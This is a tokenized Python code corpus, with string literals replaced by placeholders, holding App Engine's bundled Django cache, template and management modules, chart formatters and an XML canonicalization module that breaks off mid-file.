<s> "<STR_LIT>" <EOL> import time <EOL> from google . appengine . _internal . django . core . cache . backends . base import BaseCache , InvalidCacheBackendError <EOL> from google . appengine . _internal . django . utils . encoding import smart_unicode , smart_str <EOL> try : <EOL> import cmemcache as memcache <EOL> import warnings <EOL> warnings . warn ( <EOL> "<STR_LIT>" , <EOL> PendingDeprecationWarning <EOL> ) <EOL> except ImportError : <EOL> try : <EOL> import memcache <EOL> except : <EOL> raise InvalidCacheBackendError ( "<STR_LIT>" ) <EOL> class CacheClass ( BaseCache ) : <EOL> def __init__ ( self , server , params ) : <EOL> BaseCache . __init__ ( self , params ) <EOL> self . _cache = memcache . Client ( server . split ( '<STR_LIT:;>' ) ) <EOL> def _get_memcache_timeout ( self , timeout ) : <EOL> """<STR_LIT>""" <EOL> timeout = timeout or self . default_timeout <EOL> if timeout > <NUM_LIT> : <EOL> timeout += int ( time . time ( ) ) <EOL> return timeout <EOL> def add ( self , key , value , timeout = <NUM_LIT:0> ) : <EOL> if isinstance ( value , unicode ) : <EOL> value = value . encode ( '<STR_LIT:utf-8>' ) <EOL> return self . _cache . add ( smart_str ( key ) , value , self . _get_memcache_timeout ( timeout ) ) <EOL> def get ( self , key , default = None ) : <EOL> val = self . _cache . get ( smart_str ( key ) ) <EOL> if val is None : <EOL> return default <EOL> return val <EOL> def set ( self , key , value , timeout = <NUM_LIT:0> ) : <EOL> self . _cache . set ( smart_str ( key ) , value , self . _get_memcache_timeout ( timeout ) ) <EOL> def delete ( self , key ) : <EOL> self . _cache . delete ( smart_str ( key ) ) <EOL> def get_many ( self , keys ) : <EOL> return self . _cache . get_multi ( map ( smart_str , keys ) ) <EOL> def close ( self , ** kwargs ) : <EOL> self . _cache . disconnect_all ( ) <EOL> def incr ( self , key , delta = <NUM_LIT:1> ) : <EOL> try : <EOL> val = self . _cache . 
incr ( key , delta ) <EOL> except ValueError : <EOL> val = None <EOL> if val is None : <EOL> raise ValueError ( "<STR_LIT>" % key ) <EOL> return val <EOL> def decr ( self , key , delta = <NUM_LIT:1> ) : <EOL> try : <EOL> val = self . _cache . decr ( key , delta ) <EOL> except ValueError : <EOL> val = None <EOL> if val is None : <EOL> raise ValueError ( "<STR_LIT>" % key ) <EOL> return val <EOL> def set_many ( self , data , timeout = <NUM_LIT:0> ) : <EOL> safe_data = { } <EOL> for key , value in data . items ( ) : <EOL> if isinstance ( value , unicode ) : <EOL> value = value . encode ( '<STR_LIT:utf-8>' ) <EOL> safe_data [ smart_str ( key ) ] = value <EOL> self . _cache . set_multi ( safe_data , self . _get_memcache_timeout ( timeout ) ) <EOL> def delete_many ( self , keys ) : <EOL> self . _cache . delete_multi ( map ( smart_str , keys ) ) <EOL> def clear ( self ) : <EOL> self . _cache . flush_all ( ) </s>
<s> """<STR_LIT>""" <EOL> import socket <EOL> class CachedDnsName ( object ) : <EOL> def __str__ ( self ) : <EOL> return self . get_fqdn ( ) <EOL> def get_fqdn ( self ) : <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> self . _fqdn = socket . getfqdn ( ) <EOL> return self . _fqdn <EOL> DNS_NAME = CachedDnsName ( ) </s>
<s> import os <EOL> from google . appengine . _internal . django . core . management . base import copy_helper , CommandError , LabelCommand <EOL> from google . appengine . _internal . django . utils . importlib import import_module <EOL> class Command ( LabelCommand ) : <EOL> help = "<STR_LIT>" <EOL> args = "<STR_LIT>" <EOL> label = '<STR_LIT>' <EOL> requires_model_validation = False <EOL> can_import_settings = False <EOL> def handle_label ( self , app_name , directory = None , ** options ) : <EOL> if directory is None : <EOL> directory = os . getcwd ( ) <EOL> project_name = os . path . basename ( directory ) <EOL> if app_name == project_name : <EOL> raise CommandError ( "<STR_LIT>" <EOL> "<STR_LIT>" % app_name ) <EOL> try : <EOL> import_module ( app_name ) <EOL> except ImportError : <EOL> pass <EOL> else : <EOL> raise CommandError ( "<STR_LIT>" % app_name ) <EOL> copy_helper ( self . style , '<STR_LIT>' , app_name , directory , project_name ) <EOL> class ProjectCommand ( Command ) : <EOL> help = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def __init__ ( self , project_directory ) : <EOL> super ( ProjectCommand , self ) . __init__ ( ) <EOL> self . project_directory = project_directory <EOL> def handle_label ( self , app_name , ** options ) : <EOL> super ( ProjectCommand , self ) . handle_label ( app_name , self . project_directory , ** options ) </s>
<s> from google . appengine . _internal . django . template import TemplateSyntaxError , TemplateDoesNotExist , Variable <EOL> from google . appengine . _internal . django . template import Library , Node , TextNode <EOL> from google . appengine . _internal . django . template . loader import get_template <EOL> from google . appengine . _internal . django . conf import settings <EOL> from google . appengine . _internal . django . utils . safestring import mark_safe <EOL> register = Library ( ) <EOL> BLOCK_CONTEXT_KEY = '<STR_LIT>' <EOL> class ExtendsError ( Exception ) : <EOL> pass <EOL> class BlockContext ( object ) : <EOL> def __init__ ( self ) : <EOL> self . blocks = { } <EOL> def add_blocks ( self , blocks ) : <EOL> for name , block in blocks . iteritems ( ) : <EOL> if name in self . blocks : <EOL> self . blocks [ name ] . insert ( <NUM_LIT:0> , block ) <EOL> else : <EOL> self . blocks [ name ] = [ block ] <EOL> def pop ( self , name ) : <EOL> try : <EOL> return self . blocks [ name ] . pop ( ) <EOL> except ( IndexError , KeyError ) : <EOL> return None <EOL> def push ( self , name , block ) : <EOL> self . blocks [ name ] . append ( block ) <EOL> def get_block ( self , name ) : <EOL> try : <EOL> return self . blocks [ name ] [ - <NUM_LIT:1> ] <EOL> except ( IndexError , KeyError ) : <EOL> return None <EOL> class BlockNode ( Node ) : <EOL> def __init__ ( self , name , nodelist , parent = None ) : <EOL> self . name , self . nodelist , self . parent = name , nodelist , parent <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( self . name , self . nodelist ) <EOL> def render ( self , context ) : <EOL> block_context = context . render_context . get ( BLOCK_CONTEXT_KEY ) <EOL> context . push ( ) <EOL> if block_context is None : <EOL> context [ '<STR_LIT>' ] = self <EOL> result = self . nodelist . render ( context ) <EOL> else : <EOL> push = block = block_context . pop ( self . name ) <EOL> if block is None : <EOL> block = self <EOL> block = BlockNode ( block . 
name , block . nodelist ) <EOL> block . context = context <EOL> context [ '<STR_LIT>' ] = block <EOL> result = block . nodelist . render ( context ) <EOL> if push is not None : <EOL> block_context . push ( self . name , push ) <EOL> context . pop ( ) <EOL> return result <EOL> def super ( self ) : <EOL> render_context = self . context . render_context <EOL> if ( BLOCK_CONTEXT_KEY in render_context and <EOL> render_context [ BLOCK_CONTEXT_KEY ] . get_block ( self . name ) is not None ) : <EOL> return mark_safe ( self . render ( self . context ) ) <EOL> return '<STR_LIT>' <EOL> class ExtendsNode ( Node ) : <EOL> must_be_first = True <EOL> def __init__ ( self , nodelist , parent_name , parent_name_expr , template_dirs = None ) : <EOL> self . nodelist = nodelist <EOL> self . parent_name , self . parent_name_expr = parent_name , parent_name_expr <EOL> self . template_dirs = template_dirs <EOL> self . blocks = dict ( [ ( n . name , n ) for n in nodelist . get_nodes_by_type ( BlockNode ) ] ) <EOL> def __repr__ ( self ) : <EOL> if self . parent_name_expr : <EOL> return "<STR_LIT>" % self . parent_name_expr . token <EOL> return '<STR_LIT>' % self . parent_name <EOL> def get_parent ( self , context ) : <EOL> if self . parent_name_expr : <EOL> self . parent_name = self . parent_name_expr . resolve ( context ) <EOL> parent = self . parent_name <EOL> if not parent : <EOL> error_msg = "<STR_LIT>" % parent <EOL> if self . parent_name_expr : <EOL> error_msg += "<STR_LIT>" % self . parent_name_expr . token <EOL> raise TemplateSyntaxError ( error_msg ) <EOL> if hasattr ( parent , '<STR_LIT>' ) : <EOL> return parent <EOL> return get_template ( parent ) <EOL> def render ( self , context ) : <EOL> compiled_parent = self . get_parent ( context ) <EOL> if BLOCK_CONTEXT_KEY not in context . render_context : <EOL> context . render_context [ BLOCK_CONTEXT_KEY ] = BlockContext ( ) <EOL> block_context = context . render_context [ BLOCK_CONTEXT_KEY ] <EOL> block_context . add_blocks ( self . 
blocks ) <EOL> for node in compiled_parent . nodelist : <EOL> if not isinstance ( node , TextNode ) : <EOL> if not isinstance ( node , ExtendsNode ) : <EOL> blocks = dict ( [ ( n . name , n ) for n in <EOL> compiled_parent . nodelist . get_nodes_by_type ( BlockNode ) ] ) <EOL> block_context . add_blocks ( blocks ) <EOL> break <EOL> return compiled_parent . _render ( context ) <EOL> class ConstantIncludeNode ( Node ) : <EOL> def __init__ ( self , template_path ) : <EOL> try : <EOL> t = get_template ( template_path ) <EOL> self . template = t <EOL> except : <EOL> if settings . TEMPLATE_DEBUG : <EOL> raise <EOL> self . template = None <EOL> def render ( self , context ) : <EOL> if self . template : <EOL> return self . template . render ( context ) <EOL> else : <EOL> return '<STR_LIT>' <EOL> class IncludeNode ( Node ) : <EOL> def __init__ ( self , template_name ) : <EOL> self . template_name = Variable ( template_name ) <EOL> def render ( self , context ) : <EOL> try : <EOL> template_name = self . template_name . resolve ( context ) <EOL> t = get_template ( template_name ) <EOL> return t . render ( context ) <EOL> except : <EOL> if settings . TEMPLATE_DEBUG : <EOL> raise <EOL> return '<STR_LIT>' <EOL> def do_block ( parser , token ) : <EOL> """<STR_LIT>""" <EOL> bits = token . contents . split ( ) <EOL> if len ( bits ) != <NUM_LIT:2> : <EOL> raise TemplateSyntaxError ( "<STR_LIT>" % bits [ <NUM_LIT:0> ] ) <EOL> block_name = bits [ <NUM_LIT:1> ] <EOL> try : <EOL> if block_name in parser . __loaded_blocks : <EOL> raise TemplateSyntaxError ( "<STR_LIT>" % ( bits [ <NUM_LIT:0> ] , block_name ) ) <EOL> parser . __loaded_blocks . append ( block_name ) <EOL> except AttributeError : <EOL> parser . __loaded_blocks = [ block_name ] <EOL> nodelist = parser . parse ( ( '<STR_LIT>' , '<STR_LIT>' % block_name ) ) <EOL> parser . delete_first_token ( ) <EOL> return BlockNode ( block_name , nodelist ) <EOL> def do_extends ( parser , token ) : <EOL> """<STR_LIT>""" <EOL> bits = token . 
split_contents ( ) <EOL> if len ( bits ) != <NUM_LIT:2> : <EOL> raise TemplateSyntaxError ( "<STR_LIT>" % bits [ <NUM_LIT:0> ] ) <EOL> parent_name , parent_name_expr = None , None <EOL> if bits [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] in ( '<STR_LIT:">' , "<STR_LIT:'>" ) and bits [ <NUM_LIT:1> ] [ - <NUM_LIT:1> ] == bits [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] : <EOL> parent_name = bits [ <NUM_LIT:1> ] [ <NUM_LIT:1> : - <NUM_LIT:1> ] <EOL> else : <EOL> parent_name_expr = parser . compile_filter ( bits [ <NUM_LIT:1> ] ) <EOL> nodelist = parser . parse ( ) <EOL> if nodelist . get_nodes_by_type ( ExtendsNode ) : <EOL> raise TemplateSyntaxError ( "<STR_LIT>" % bits [ <NUM_LIT:0> ] ) <EOL> return ExtendsNode ( nodelist , parent_name , parent_name_expr ) <EOL> def do_include ( parser , token ) : <EOL> """<STR_LIT>""" <EOL> bits = token . split_contents ( ) <EOL> if len ( bits ) != <NUM_LIT:2> : <EOL> raise TemplateSyntaxError ( "<STR_LIT>" % bits [ <NUM_LIT:0> ] ) <EOL> path = bits [ <NUM_LIT:1> ] <EOL> if path [ <NUM_LIT:0> ] in ( '<STR_LIT:">' , "<STR_LIT:'>" ) and path [ - <NUM_LIT:1> ] == path [ <NUM_LIT:0> ] : <EOL> return ConstantIncludeNode ( path [ <NUM_LIT:1> : - <NUM_LIT:1> ] ) <EOL> return IncludeNode ( bits [ <NUM_LIT:1> ] ) <EOL> register . tag ( '<STR_LIT>' , do_block ) <EOL> register . tag ( '<STR_LIT>' , do_extends ) <EOL> register . tag ( '<STR_LIT>' , do_include ) </s>
<s> import imp <EOL> import os <EOL> import sys <EOL> def module_has_submodule ( package , module_name ) : <EOL> """<STR_LIT>""" <EOL> name = "<STR_LIT:.>" . join ( [ package . __name__ , module_name ] ) <EOL> try : <EOL> return sys . modules [ name ] is not None <EOL> except KeyError : <EOL> pass <EOL> for finder in sys . meta_path : <EOL> if finder . find_module ( name ) : <EOL> return True <EOL> for entry in package . __path__ : <EOL> try : <EOL> finder = sys . path_importer_cache [ entry ] <EOL> if finder is None : <EOL> try : <EOL> file_ , _ , _ = imp . find_module ( module_name , [ entry ] ) <EOL> if file_ : <EOL> file_ . close ( ) <EOL> return True <EOL> except ImportError : <EOL> continue <EOL> elif finder . find_module ( name ) : <EOL> return True <EOL> else : <EOL> continue <EOL> except KeyError : <EOL> for hook in sys . path_hooks : <EOL> try : <EOL> finder = hook ( entry ) <EOL> if finder . find_module ( name ) : <EOL> return True <EOL> else : <EOL> break <EOL> except ImportError : <EOL> continue <EOL> else : <EOL> if os . path . isdir ( entry ) : <EOL> try : <EOL> file_ , _ , _ = imp . find_module ( module_name , [ entry ] ) <EOL> if file_ : <EOL> file_ . close ( ) <EOL> return True <EOL> except ImportError : <EOL> pass <EOL> else : <EOL> return False </s>
<s> """<STR_LIT>""" <EOL> def AutoLegend ( chart ) : <EOL> """<STR_LIT>""" <EOL> chart . _show_legend = False <EOL> labels = [ ] <EOL> for series in chart . data : <EOL> if series . label is None : <EOL> labels . append ( '<STR_LIT>' ) <EOL> else : <EOL> labels . append ( series . label ) <EOL> chart . _show_legend = True <EOL> if chart . _show_legend : <EOL> chart . _legend_labels = labels <EOL> class AutoColor ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . colors = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> def __call__ ( self , chart ) : <EOL> index = - <NUM_LIT:1> <EOL> for series in chart . data : <EOL> if series . style . color is None : <EOL> index += <NUM_LIT:1> <EOL> if index >= len ( self . colors ) : <EOL> index = <NUM_LIT:0> <EOL> series . style . color = self . colors [ index ] <EOL> class AutoScale ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , buffer = <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> self . buffer = buffer <EOL> def __call__ ( self , chart ) : <EOL> """<STR_LIT>""" <EOL> if not chart . data : <EOL> return <EOL> min_value , max_value = chart . GetMinMaxValues ( ) <EOL> if None in ( min_value , max_value ) : <EOL> return <EOL> for axis in chart . GetDependentAxes ( ) : <EOL> if axis . min is not None : <EOL> min_value = axis . min <EOL> if axis . max is not None : <EOL> max_value = axis . max <EOL> buffer = ( max_value - min_value ) * self . buffer <EOL> for axis in chart . GetDependentAxes ( ) : <EOL> if axis . min is None : <EOL> axis . min = min_value - buffer <EOL> if axis . max is None : <EOL> axis . max = max_value + buffer <EOL> class LabelSeparator ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , left = None , right = None , bottom = None ) : <EOL> self . left = left <EOL> self . right = right <EOL> self . bottom = bottom <EOL> def __call__ ( self , chart ) : <EOL> self . AdjustLabels ( chart . left , self . left ) <EOL> self . AdjustLabels ( chart . 
right , self . right ) <EOL> self . AdjustLabels ( chart . bottom , self . bottom ) <EOL> def AdjustLabels ( self , axis , minimum_label_spacing ) : <EOL> if minimum_label_spacing is None : <EOL> return <EOL> if len ( axis . labels ) <= <NUM_LIT:1> : <EOL> return <EOL> if axis . max is not None and axis . min is not None : <EOL> maximum_possible_spacing = ( axis . max - axis . min ) / ( len ( axis . labels ) - <NUM_LIT:1> ) <EOL> if minimum_label_spacing > maximum_possible_spacing : <EOL> minimum_label_spacing = maximum_possible_spacing <EOL> labels = [ list ( x ) for x in zip ( axis . label_positions , axis . labels ) ] <EOL> labels = sorted ( labels , reverse = True ) <EOL> for i in range ( <NUM_LIT:1> , len ( labels ) ) : <EOL> if labels [ i - <NUM_LIT:1> ] [ <NUM_LIT:0> ] - labels [ i ] [ <NUM_LIT:0> ] < minimum_label_spacing : <EOL> new_position = labels [ i - <NUM_LIT:1> ] [ <NUM_LIT:0> ] - minimum_label_spacing <EOL> if axis . min is not None and new_position < axis . min : <EOL> new_position = axis . min <EOL> labels [ i ] [ <NUM_LIT:0> ] = new_position <EOL> for i in range ( len ( labels ) - <NUM_LIT:2> , - <NUM_LIT:1> , - <NUM_LIT:1> ) : <EOL> if labels [ i ] [ <NUM_LIT:0> ] - labels [ i + <NUM_LIT:1> ] [ <NUM_LIT:0> ] < minimum_label_spacing : <EOL> new_position = labels [ i + <NUM_LIT:1> ] [ <NUM_LIT:0> ] + minimum_label_spacing <EOL> if axis . max is not None and new_position > axis . max : <EOL> new_position = axis . max <EOL> labels [ i ] [ <NUM_LIT:0> ] = new_position <EOL> label_positions , labels = zip ( * labels ) <EOL> axis . labels = labels <EOL> axis . label_positions = label_positions <EOL> def InlineLegend ( chart ) : <EOL> """<STR_LIT>""" <EOL> show = False <EOL> labels = [ ] <EOL> label_positions = [ ] <EOL> for series in chart . data : <EOL> if series . label is None : <EOL> labels . append ( '<STR_LIT>' ) <EOL> else : <EOL> labels . append ( series . label ) <EOL> show = True <EOL> label_positions . append ( series . 
data [ - <NUM_LIT:1> ] ) <EOL> if show : <EOL> chart . right . min = chart . left . min <EOL> chart . right . max = chart . left . max <EOL> chart . right . labels = labels <EOL> chart . right . label_positions = label_positions <EOL> chart . _show_legend = False </s>
<s> """<STR_LIT>""" <EOL> _copyright = '''<STR_LIT>''' <EOL> _copyright += "<STR_LIT>" <EOL> _copyright += '''<STR_LIT>''' <EOL> from xml . dom import Node <EOL> from Namespaces import XMLNS <EOL> import cStringIO as StringIO <EOL> try : <EOL> from xml . dom . ext import c14n <EOL> except ImportError , ex : <EOL> _implementation2 = None <EOL> _attrs = lambda E : ( E . attributes and E . attributes . values ( ) ) or [ ] <EOL> _children = lambda E : E . childNodes or [ ] <EOL> else : <EOL> class _implementation2 ( c14n . _implementation ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , node , write , ** kw ) : <EOL> self . unsuppressedPrefixes = kw . get ( '<STR_LIT>' ) <EOL> self . _exclusive = None <EOL> if node . nodeType == Node . ELEMENT_NODE : <EOL> if not c14n . _inclusive ( self ) : <EOL> self . _exclusive = self . _inherit_context ( node ) <EOL> c14n . _implementation . __init__ ( self , node , write , ** kw ) <EOL> def _do_element ( self , node , initial_other_attrs = [ ] ) : <EOL> """<STR_LIT>""" <EOL> ns_parent , ns_rendered , xml_attrs = self . state [ <NUM_LIT:0> ] , self . state [ <NUM_LIT:1> ] . copy ( ) , self . state [ <NUM_LIT:2> ] . copy ( ) <EOL> ns_local = ns_parent . copy ( ) <EOL> xml_attrs_local = { } <EOL> other_attrs = [ ] <EOL> sort_these_attrs = initial_other_attrs [ : ] <EOL> in_subset = c14n . _in_subset ( self . subset , node ) <EOL> sort_these_attrs += c14n . _attrs ( node ) <EOL> for a in sort_these_attrs : <EOL> if a . namespaceURI == c14n . XMLNS . BASE : <EOL> n = a . nodeName <EOL> if n == "<STR_LIT>" : n = "<STR_LIT>" <EOL> ns_local [ n ] = a . nodeValue <EOL> elif a . namespaceURI == c14n . XMLNS . XML : <EOL> if c14n . _inclusive ( self ) or ( in_subset and c14n . _in_subset ( self . subset , a ) ) : <EOL> xml_attrs_local [ a . nodeName ] = a <EOL> else : <EOL> if c14n . _in_subset ( self . subset , a ) : <EOL> other_attrs . append ( a ) <EOL> xml_attrs . update ( xml_attrs_local ) <EOL> W , name = self . 
write , None <EOL> if in_subset : <EOL> name = node . nodeName <EOL> W ( '<STR_LIT:<>' ) <EOL> W ( name ) <EOL> ns_to_render = [ ] <EOL> for n , v in ns_local . items ( ) : <EOL> if n == "<STR_LIT>" and v in [ c14n . XMLNS . BASE , '<STR_LIT>' ] and ns_rendered . get ( '<STR_LIT>' ) in [ c14n . XMLNS . BASE , '<STR_LIT>' , None ] : <EOL> continue <EOL> if n in [ "<STR_LIT>" , "<STR_LIT>" ] and v in [ '<STR_LIT>' ] : <EOL> continue <EOL> if ( n , v ) not in ns_rendered . items ( ) and ( c14n . _inclusive ( self ) or c14n . _utilized ( n , node , other_attrs , self . unsuppressedPrefixes ) ) : <EOL> ns_to_render . append ( ( n , v ) ) <EOL> if not c14n . _inclusive ( self ) : <EOL> if node . prefix is None : <EOL> look_for = [ ( '<STR_LIT>' , node . namespaceURI ) , ] <EOL> else : <EOL> look_for = [ ( '<STR_LIT>' % node . prefix , node . namespaceURI ) , ] <EOL> for a in c14n . _attrs ( node ) : <EOL> if a . namespaceURI != XMLNS . BASE : <EOL> if a . prefix : <EOL> look_for . append ( ( '<STR_LIT>' % a . prefix , a . namespaceURI ) ) <EOL> for key , namespaceURI in look_for : <EOL> if ns_rendered . has_key ( key ) : <EOL> if ns_rendered [ key ] == namespaceURI : <EOL> pass <EOL> else : <EOL> pass <EOL> elif ( key , namespaceURI ) in ns_to_render : <EOL> pass <EOL> else : <EOL> ns_local [ key ] = namespaceURI <EOL> for a in self . _exclusive : <EOL> if a . nodeName == key : <EOL> ns_to_render += [ ( a . nodeName , a . value ) ] <EOL> break <EOL> elif key is None and a . nodeName == '<STR_LIT>' : <EOL> ns_to_render += [ ( a . nodeName , a . value ) ] <EOL> break <EOL> else : <EOL> raise RuntimeError , '<STR_LIT>' % ( key , namespaceURI ) <EOL> ns_to_render . sort ( c14n . _sorter_ns ) <EOL> for n , v in ns_to_render : <EOL> if v : self . _do_attr ( n , v ) <EOL> else : <EOL> v = '<STR_LIT>' <EOL> self . _do_attr ( n , v ) <EOL> ns_rendered [ n ] = v <EOL> if not c14n . _inclusive ( self ) or c14n . _in_subset ( self . subset , node . parentNode ) : <EOL> other_attrs . 
extend ( xml_attrs_local . values ( ) ) <EOL> else : <EOL> other_attrs . extend ( xml_attrs . values ( ) ) <EOL> other_attrs . sort ( c14n . _sorter ) <EOL> for a in other_attrs : <EOL> self . _do_attr ( a . nodeName , a . value ) <EOL> W ( '<STR_LIT:>>' ) <EOL> state , self . state = self . state , ( ns_local , ns_rendered , xml_attrs ) <EOL> for c in c14n . _children ( node ) : <EOL> c14n . _implementation . handlers [ c . nodeType ] ( self , c ) <EOL> self . state = state <EOL> if name : W ( '<STR_LIT>' % name ) <EOL> c14n . _implementation . handlers [ c14n . Node . ELEMENT_NODE ] = _do_element <EOL> _IN_XML_NS = lambda n : n . namespaceURI == XMLNS . XML <EOL> _LesserElement , _Element , _GreaterElement = range ( <NUM_LIT:3> ) <EOL> def _sorter ( n1 , n2 ) : <EOL> '''<STR_LIT>''' <EOL> i = cmp ( n1 . namespaceURI , n2 . namespaceURI ) <EOL> if i : return i <EOL> return cmp ( n1 . localName , n2 . localName ) <EOL> def _sorter_ns ( n1 , n2 ) : <EOL> '''<STR_LIT>''' <EOL> if n1 [ <NUM_LIT:0> ] == '<STR_LIT>' : return - <NUM_LIT:1> <EOL> if n2 [ <NUM_LIT:0> ] == '<STR_LIT>' : return <NUM_LIT:1> <EOL> return cmp ( n1 [ <NUM_LIT:0> ] , n2 [ <NUM_LIT:0> ] ) <EOL> def _utilized ( n , node , other_attrs , unsuppressedPrefixes ) : <EOL> '''<STR_LIT>''' <EOL> if n . startswith ( '<STR_LIT>' ) : <EOL> n = n [ <NUM_LIT:6> : ] <EOL> elif n . startswith ( '<STR_LIT>' ) : <EOL> n = n [ <NUM_LIT:5> : ] <EOL> if n == node . prefix or n in unsuppressedPrefixes : return <NUM_LIT:1> <EOL> for attr in other_attrs : <EOL> if n == attr . prefix : return <NUM_LIT:1> <EOL> return <NUM_LIT:0> <EOL> _in_subset = lambda subset , node : not subset or node in subset <EOL> class _implementation : <EOL> '''<STR_LIT>''' <EOL> handlers = { } <EOL> def __init__ ( self , node , write , ** kw ) : <EOL> '''<STR_LIT>''' <EOL> self . write = write <EOL> self . subset = kw . get ( '<STR_LIT>' ) <EOL> if self . subset : <EOL> self . comments = kw . 
get ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> else : <EOL> self . comments = kw . get ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> self . unsuppressedPrefixes = kw . get ( '<STR_LIT>' ) <EOL> nsdict = kw . get ( '<STR_LIT>' , { '<STR_LIT>' : XMLNS . XML , '<STR_LIT>' : XMLNS . BASE } ) <EOL> self . state = ( nsdict , [ '<STR_LIT>' ] , [ ] ) <EOL> if node . nodeType == Node . DOCUMENT_NODE : <EOL> self . _do_document ( node ) <EOL> elif node . nodeType == Node . ELEMENT_NODE : <EOL> self . documentOrder = _Element <EOL> if self . unsuppressedPrefixes is not None : <EOL> self . _do_element ( node ) <EOL> else : <EOL> inherited = self . _inherit_context ( node ) <EOL> self . _do_element ( node , inherited ) <EOL> elif node . nodeType == Node . DOCUMENT_TYPE_NODE : <EOL> pass <EOL> else : <EOL> raise TypeError , str ( node ) <EOL> def _inherit_context ( self , node ) : <EOL> '''<STR_LIT>''' <EOL> xmlattrs = filter ( _IN_XML_NS , _attrs ( node ) ) <EOL> inherited , parent = [ ] , node . parentNode <EOL> while parent and parent . nodeType == Node . ELEMENT_NODE : <EOL> for a in filter ( _IN_XML_NS , _attrs ( parent ) ) : <EOL> n = a . localName <EOL> if n not in xmlattrs : <EOL> xmlattrs . append ( n ) <EOL> inherited . append ( a ) <EOL> parent = parent . parentNode <EOL> return inherited <EOL> def _do_document ( self , node ) : <EOL> '''<STR_LIT>''' <EOL> self . documentOrder = _LesserElement <EOL> for child in node . childNodes : <EOL> if child . nodeType == Node . ELEMENT_NODE : <EOL> self . documentOrder = _Element <EOL> self . _do_element ( child ) <EOL> self . documentOrder = _GreaterElement <EOL> elif child . nodeType == Node . PROCESSING_INSTRUCTION_NODE : <EOL> self . _do_pi ( child ) <EOL> elif child . nodeType == Node . COMMENT_NODE : <EOL> self . _do_comment ( child ) <EOL> elif child . nodeType == Node . DOCUMENT_TYPE_NODE : <EOL> pass <EOL> else : <EOL> raise TypeError , str ( child ) <EOL> handlers [ Node . 
DOCUMENT_NODE ] = _do_document <EOL> def _do_text ( self , node ) : <EOL> '''<STR_LIT>''' <EOL> if not _in_subset ( self . subset , node ) : return <EOL> s = node . data . replace ( "<STR_LIT:&>" , "<STR_LIT>" ) . replace ( "<STR_LIT:<>" , "<STR_LIT>" ) . replace ( "<STR_LIT:>>" , "<STR_LIT>" ) . replace ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> if s : self . write ( s ) <EOL> handlers [ Node . TEXT_NODE ] = _do_text <EOL> handlers [ Node . CDATA_SECTION_NODE ] = _do_text <EOL> def _do_pi ( self , node ) : <EOL> '''<STR_LIT>''' <EOL> if not _in_subset ( self . subset , node ) : return <EOL> W = self . write <EOL> if self . documentOrder == _GreaterElement : W ( '<STR_LIT:\n>' ) <EOL> W ( '<STR_LIT>' ) <EOL> W ( node . nodeName ) <EOL> s = node . data <EOL> if s : <EOL> W ( '<STR_LIT:U+0020>' ) <EOL> W ( s ) <EOL> W ( '<STR_LIT>' ) <EOL> if self . documentOrder == _LesserElement : W ( '<STR_LIT:\n>' ) <EOL> handlers [ Node . PROCESSING_INSTRUCTION_NODE ] = _do_pi <EOL> def _do_comment ( self , node ) : <EOL> '''<STR_LIT>''' <EOL> if not _in_subset ( self . subset , node ) : return <EOL> if self . comments : <EOL> W = self . write <EOL> if self . documentOrder == _GreaterElement : W ( '<STR_LIT:\n>' ) <EOL> W ( '<STR_LIT>' ) <EOL> W ( node . data ) <EOL> W ( '<STR_LIT>' ) <EOL> if self . documentOrder == _LesserElement : W ( '<STR_LIT:\n>' ) <EOL> handlers [ Node . COMMENT_NODE ] = _do_comment <EOL> def _do_attr ( self , n , value ) : <EOL> '''<STR_LIT>''' <EOL> W = self . write <EOL> W ( '<STR_LIT:U+0020>' ) <EOL> W ( n ) <EOL> W ( '<STR_LIT>' ) <EOL> s = value . replace ( "<STR_LIT:&>" , "<STR_LIT>" ) . replace ( "<STR_LIT:<>" , "<STR_LIT>" ) . replace ( '<STR_LIT:">' , '<STR_LIT>' ) . replace ( '<STR_LIT>' , '<STR_LIT>' ) . replace ( '<STR_LIT>' , '<STR_LIT>' ) . 
replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> W ( s ) <EOL> W ( '<STR_LIT:">' ) <EOL> def _do_element ( self , node , initial_other_attrs = [ ] ) : <EOL> '''<STR_LIT>''' <EOL> ns_parent , ns_rendered , xml_attrs = self . state [ <NUM_LIT:0> ] , self . state [ <NUM_LIT:1> ] [ : ] , self . state [ <NUM_LIT:2> ] [ : ] <EOL> ns_local = ns_parent . copy ( ) <EOL> other_attrs = initial_other_attrs [ : ] <EOL> in_subset = _in_subset ( self . subset , node ) <EOL> for a in _attrs ( node ) : <EOL> if a . namespaceURI == XMLNS . BASE : <EOL> n = a . nodeName <EOL> if n == "<STR_LIT>" : n = "<STR_LIT>" <EOL> ns_local [ n ] = a . nodeValue <EOL> elif a . namespaceURI == XMLNS . XML : <EOL> if self . unsuppressedPrefixes is None or in_subset : <EOL> xml_attrs . append ( a ) <EOL> else : <EOL> other_attrs . append ( a ) <EOL> W , name = self . write , None <EOL> if in_subset : <EOL> name = node . nodeName <EOL> W ( '<STR_LIT:<>' ) <EOL> W ( name ) <EOL> ns_to_render = [ ] <EOL> for n , v in ns_local . items ( ) : <EOL> pval = ns_parent . get ( n ) <EOL> if n == "<STR_LIT>" and v in [ XMLNS . BASE , '<STR_LIT>' ] and pval in [ XMLNS . BASE , '<STR_LIT>' ] : <EOL> continue <EOL> if n == "<STR_LIT>" and v in [ '<STR_LIT>' ] : <EOL> continue <EOL> if ( v != pval or n not in ns_rendered ) and ( self . unsuppressedPrefixes is None or _utilized ( n , node , other_attrs , self . unsuppressedPrefixes ) ) : <EOL> ns_to_render . append ( ( n , v ) ) <EOL> ns_to_render . sort ( _sorter_ns ) <EOL> for n , v in ns_to_render : <EOL> self . _do_attr ( n , v ) <EOL> ns_rendered . append ( n ) <EOL> other_attrs . extend ( xml_attrs ) <EOL> xml_attrs = [ 